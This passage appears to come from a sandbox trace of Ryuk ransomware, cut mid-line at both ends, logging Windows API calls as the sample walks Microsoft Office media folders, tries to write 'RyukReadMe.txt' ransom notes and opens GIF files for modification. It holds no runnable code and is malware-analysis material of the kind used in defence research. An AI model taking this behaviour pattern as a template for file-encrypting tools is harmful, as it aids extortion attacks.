(lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.811] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0135.811] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0135.812] SetLastError (dwErrCode=0x0) [0135.812] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.815] GetLastError () returned 0x5 [0135.815] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0135.815] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.815] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.815] SetLastError (dwErrCode=0x0) [0135.815] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.815] GetLastError () returned 0x5 [0135.815] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0135.815] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.815] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0135.817] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.817] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.817] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.818] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10253_.GIF", dwFileAttributes=0x80) returned 0 [0135.819] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10253_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10253_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.819] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.819] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.819] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.819] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.819] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10254_.GIF", dwFileAttributes=0x80) returned 0 [0135.819] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10254_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10254_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.820] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.820] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.820] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.820] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.820] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10255_.GIF", dwFileAttributes=0x80) returned 0 [0135.820] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10255_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10255_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.820] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.820] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.820] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.820] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.821] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10263_.GIF", dwFileAttributes=0x80) returned 0 [0135.821] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10263_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10263_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.821] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.821] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.821] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.821] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.822] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10264_.GIF", dwFileAttributes=0x80) returned 0 [0135.822] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10264_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10264_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.822] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.822] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.822] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.822] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.822] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10265_.GIF", dwFileAttributes=0x80) returned 0 [0135.823] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10265_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10265_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.823] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.823] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.823] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.823] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.823] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10266_.GIF", dwFileAttributes=0x80) returned 0 [0135.823] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10266_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10266_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.823] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.823] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.824] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.824] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.824] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10267_.GIF", dwFileAttributes=0x80) returned 0 [0135.824] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10267_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10267_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.824] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.824] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.824] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.824] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.824] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10268_.GIF", dwFileAttributes=0x80) returned 0 [0135.824] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10268_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10268_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.824] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.825] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.825] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.825] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.825] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10297_.GIF", dwFileAttributes=0x80) returned 0 [0135.826] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10297_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10297_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.826] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.826] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.826] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.826] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.826] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10298_.GIF", dwFileAttributes=0x80) returned 0 [0135.827] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10298_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10298_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.827] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.827] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.827] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.827] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.827] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10299_.GIF", dwFileAttributes=0x80) returned 0 [0135.828] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10299_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10299_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.828] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.828] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.828] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.828] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.828] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10300_.GIF", dwFileAttributes=0x80) returned 0 [0135.828] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10300_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10300_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.829] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.829] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.829] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.829] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.829] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10301_.GIF", dwFileAttributes=0x80) returned 0 [0135.829] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10301_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10301_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.829] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.829] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.829] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.829] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.830] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10302_.GIF", dwFileAttributes=0x80) returned 0 [0135.830] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10302_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10302_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.830] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.830] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.830] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.830] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.830] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10335_.GIF", dwFileAttributes=0x80) returned 0 [0135.831] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10335_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10335_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.831] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.831] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.831] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.831] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.831] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10336_.GIF", dwFileAttributes=0x80) returned 0 [0135.831] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10336_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10336_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.831] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.831] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.832] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.832] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.832] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10337_.GIF", dwFileAttributes=0x80) returned 0 [0135.832] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10337_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10337_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.832] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.832] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.833] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.833] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.833] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14513_.GIF", dwFileAttributes=0x80) returned 0 [0135.833] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14513_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14513_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.833] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.834] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.834] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.834] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.834] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14514_.GIF", dwFileAttributes=0x80) returned 0 [0135.834] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14514_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14514_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.834] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.834] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.834] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.834] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.834] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14515_.GIF", dwFileAttributes=0x80) returned 0 [0135.835] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14515_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14515_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.835] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.835] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.835] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.835] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.835] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14528_.GIF", dwFileAttributes=0x80) returned 0 [0135.835] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14528_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14528_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.835] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.835] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.835] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.835] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.836] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14529_.GIF", dwFileAttributes=0x80) returned 0 [0135.836] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14529_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14529_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.836] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.836] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.836] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.836] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.836] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14530_.GIF", dwFileAttributes=0x80) returned 0 [0135.836] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14530_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14530_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.836] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.837] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.837] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.837] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.837] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14531_.GIF", dwFileAttributes=0x80) returned 0 [0135.837] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14531_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14531_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.837] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.837] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.837] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.837] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.837] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14532_.GIF", dwFileAttributes=0x80) returned 0 [0135.838] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14532_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14532_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.838] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.838] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.838] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.838] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.838] 